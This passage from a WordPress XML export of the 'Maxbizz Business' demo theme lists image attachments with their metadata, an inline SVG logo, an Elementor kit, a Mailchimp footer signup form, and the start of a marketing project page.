		<pubDate>Tue, 29 Dec 2020 08:15:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team8.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2063</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 08:15:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 08:15:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team8]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team8.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/team8.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/12/team8.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:17:"team8-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team8-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team8-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team8-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:17:"team8-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>02_Black</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/ot_header_builders/header-2/02_black/</link>
		<pubDate>Tue, 29 Dec 2020 08:46:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/02_Black.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2074</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 08:46:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 08:46:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[02_black]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>106</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/02_Black.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/02_Black.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#1B1D21;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop offset="2.012780e-07" style="stop-color:#A4C1FF"></stop>
	<stop offset="1" style="stop-color:#4B83FC"></stop>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-faq</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/faqs/bg2-faq/</link>
		<pubDate>Tue, 29 Dec 2020 09:09:48 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-faq.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2082</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 09:09:48]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 09:09:48]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-faq]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-faq.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/bg2-faq.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:681;s:4:"file";s:19:"2020/12/bg2-faq.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:19:"bg2-faq-300x106.jpg";s:5:"width";i:300;s:6:"height";i:106;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"bg2-faq-1024x363.jpg";s:5:"width";i:1024;s:6:"height";i:363;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"bg2-faq-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"bg2-faq-768x272.jpg";s:5:"width";i:768;s:6:"height";i:272;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:20:"bg2-faq-1536x545.jpg";s:5:"width";i:1536;s:6:"height";i:545;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"bg2-faq-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"bg2-faq-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:20:"bg2-faq-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:20:"bg2-faq-1200x681.jpg";s:5:"width";i:1200;s:6:"height";i:681;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>logo-home3-black</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/coming-soon/logo-home3-black/</link>
		<pubDate>Tue, 29 Dec 2020 09:32:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/logo-home3-black.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2091</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 09:32:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 09:32:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[logo-home3-black]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>604</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/logo-home3-black.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/logo-home3-black.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:141;s:6:"height";i:25;s:4:"file";s:28:"2020/12/logo-home3-black.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Default Kit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/?elementor_library=default-kit</link>
		<pubDate>Mon, 02 Nov 2020 03:58:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/?elementor_library=default-kit</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 03:58:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 03:58:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[default-kit]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[elementor_library]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[kit]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.12]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_page_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:2:{s:9:"site_name";s:16:"Maxbizz Business";s:16:"site_description";s:47:"Financial &amp; Consulting Demo WordPress Theme";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:comment>
			<wp:comment_id>1</wp:comment_id>
			<wp:comment_author><![CDATA[A WordPress Commenter]]></wp:comment_author>
			<wp:comment_author_email><![CDATA[wapuu@wordpress.example]]></wp:comment_author_email>
			<wp:comment_author_url>https://wordpress.org/</wp:comment_author_url>
			<wp:comment_author_IP><![CDATA[]]></wp:comment_author_IP>
			<wp:comment_date><![CDATA[2020-11-02 03:58:36]]></wp:comment_date>
			<wp:comment_date_gmt><![CDATA[2020-11-02 03:58:36]]></wp:comment_date_gmt>
			<wp:comment_content><![CDATA[Hi, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from <a href="https://gravatar.com">Gravatar</a>.]]></wp:comment_content>
			<wp:comment_approved><![CDATA[1]]></wp:comment_approved>
			<wp:comment_type><![CDATA[comment]]></wp:comment_type>
			<wp:comment_parent>0</wp:comment_parent>
			<wp:comment_user_id>0</wp:comment_user_id>
							</wp:comment>
					</item>
					<item>
		<title>Footer Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/mc4wp-form/footer-form/</link>
		<pubDate>Mon, 02 Nov 2020 04:06:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/mc4wp-form/footer-form/</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="subscribe-inner-form">
    <input type="email" name="EMAIL" placeholder="Your Email *" required />
	<button type="submit" class="subscribe-btn-icon"><i class="ot-flaticon-trajectory"></i></button>
</div>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>325</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 04:06:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 04:06:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[footer-form]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[mc4wp-form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_mc4wp_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:15:"required_fields";s:5:"EMAIL";s:12:"double_optin";s:1:"1";s:15:"update_existing";s:1:"0";s:17:"replace_interests";s:1:"1";s:15:"subscriber_tags";s:0:"";s:18:"hide_after_success";s:1:"0";s:8:"redirect";s:0:"";s:3:"css";s:1:"0";s:5:"lists";a:0:{}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_subscribed]]></wp:meta_key>
		<wp:meta_value><![CDATA[Thank you, your sign-up request was successful! Please check your email inbox to confirm.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_invalid_email]]></wp:meta_key>
		<wp:meta_value><![CDATA[Please provide a valid email address.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_required_field_missing]]></wp:meta_key>
		<wp:meta_value><![CDATA[Please fill in the required fields.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_already_subscribed]]></wp:meta_key>
		<wp:meta_value><![CDATA[Given email address is already subscribed, thank you!]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_error]]></wp:meta_key>
		<wp:meta_value><![CDATA[Oops. Something went wrong. Please try again later.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_unsubscribed]]></wp:meta_key>
		<wp:meta_value><![CDATA[You were successfully unsubscribed.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_not_subscribed]]></wp:meta_key>
		<wp:meta_value><![CDATA[Given email address is not subscribed.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_no_lists_selected]]></wp:meta_key>
		<wp:meta_value><![CDATA[Please select at least one list.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_updated]]></wp:meta_key>
		<wp:meta_value><![CDATA[Thank you, your records have been updated!]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-07-28]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-10-21]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>MB Project Single</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/?elementor_library=mb-project-single</link>
		<pubDate>Tue, 29 Sep 2020 08:52:15 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?elementor_library=mb-project-single</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>BusinessMax</p>		
			<h6>Website:</h6>		
		<p>businessmax.com</p>		
			<h6>Date:</h6>		
		<p>November 22, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							

	
		
			
		
	
	
	































						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							

	
		
			
		
	
	
	































						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
